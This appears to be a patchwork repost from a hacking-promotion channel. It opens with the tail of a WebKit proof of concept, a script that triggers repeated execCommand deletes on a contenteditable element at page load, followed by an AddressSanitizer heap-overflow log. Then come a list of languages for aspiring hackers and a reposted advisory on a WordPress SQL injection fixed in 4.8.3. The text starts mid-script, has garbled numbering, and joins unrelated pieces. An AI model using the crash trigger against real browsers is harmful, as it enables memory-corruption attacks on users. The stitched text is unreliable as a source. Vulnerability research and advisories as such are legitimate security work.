window.getSelection().setPosition(h,1);
document.execCommand("delete", false);
document.execCommand("delete", false);
}
</script>
<body onload=go()>
<listing>
<dd contenteditable="true">
<h3 id="h">I>EO~P</h3>

/*

🦑 ASan log:


==30388==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000f5de6 at pc 0x00010ff1c575 bp 0x7fff5a427300 sp 0x7fff5a4272f8
READ of size 2 at 0x6030000f5de6 thread T0
==30388==WARNING: invalid path to external symbolizer!
==30388==WARNING: Failed to use and restart external symbolizer!

2) #0 0x10ff1c574 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574)

3) #1 0x110edd834 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfec834)

4) #2 0x110ee587f in WebCore::InlineTextBox::positionForOffset(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore

5) AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) in WTF::StringImpl::at(unsigned int) const
Shadow bytes around the buggy address:
0x1c060001eb60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x1c060001eb70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd

...

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 REQUIREMENTS Programming languages TO BE A WHITE HACKER :
t.me/UndercOdeTesting

1) HTML: One of the easiest and widely used static markup web language present in each and every website you see in your browser. It’s recommended to learn HTML because it helps understanding web actions, response, and logic.

2) CSS: This is the design of the website, it’s like the wallpaper or decoration in the house. Javascript: A client-side web programming mostly used in web sites for better user interface and quick response. If you are interested in a hacking career you need to learn JavaScript because it helps to understand client-side mechanism which is essential for finding client-side flaws.

3) PHP: A dynamic server-side language which is responsible for managing web-apps and database. PHP is considered one of the most essential language because it controls everything on site and server, like a captain of a ship. It is advised to learn PHP nicely.

4) SQL: SQL is responsible for storing and managing sensitive and confidential data such as user credentials, bank and personal information about the website visitors. Black hat hackers mostly target SQL database and steal information which is later sold on underground dark web forum. If you want to be good security researcher, you should learn SQL so that you can find flaws in a website and report them.

🦑 Exploit Programming :

5) Python: It is said that a security researcher or hacker should know Python because it the core language for creating exploits and tools. Security experts and even pro hackers suggest that mastering Python is the best way to learn hacking. Python offers wider flexibility and you can create exploits only if you are good in Python. Ruby: Ruby is a simple yet complicated object-oriented language.

6) Ruby is very useful when it comes to exploit writing. It is used for meterpreter scripting by hackers. The most famous hacker tool, Metasploit framework is programmed in Ruby. Though Ruby may not be as versatile as Python, knowledge of Ruby is must in understanding exploits.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WordPress Full Version SQL Injection Vulnerability All Versions Affected Before 4.8.3 :
pinterest.com/Undercode_Testing


1) There are quite a lot of WordPress vulnerabilities. Recently, WordPress has exposed SQL injection vulnerabilities. All versions before 4.8.3 are affected. Due to its large usage, NSFOCUS issued a threat notice, the full text of which is as follows:

2) WordPress WPDB SQL injection vulnerability threat warning notice
On October 31, 2017, WordPress officially released the 4.8.3 security update, which fixed a SQL injection vulnerability that existed in the previous full version.

3) The vulnerability stems from the fact that $ wpdb-> prepare () can generate dangerous query commands, leading to potential SQL injection. The core of WordPress is not easily affected by the vulnerability, but WordPress officially strengthened the security of plugins and themes to prevent the vulnerability from being triggered.

🦑1) Related Link:

https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/

2) Affected area

Affected version WordPress <= 4.8.2
Unaffected version WordPress 4.8.3

3) solution

> WordPress has officially released the latest version 4.8.3 to fix this vulnerability. Users using 4.8.2 and previous versions should upgrade to 4.8.3 in time to protect against this vulnerability.

> Reference link:

https://wordpress.org/download/

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 NSFOCUS Technology Statement :
twitter.com/UndercodeNews
1) This security bulletin is only used to describe possible security issues.

2) NSFOCUS does not provide any guarantee or commitment for this security bulletin. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this security bulletin are the responsibility of the user himself.

3) NSFOCUS and the author of the security bulletin shall not bear any responsibility for this. NSFOCUS has the right to modify and interpret this security announcement.

4) If you want to reprint or disseminate this security bulletin, you must ensure the integrity of this security bulletin, including the entire contents of the copyright statement. Without the permission of NSFOCUS Technology, the content of this security bulletin may not be modified or added arbitrarily, and it may not be used for commercial purposes in any way.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁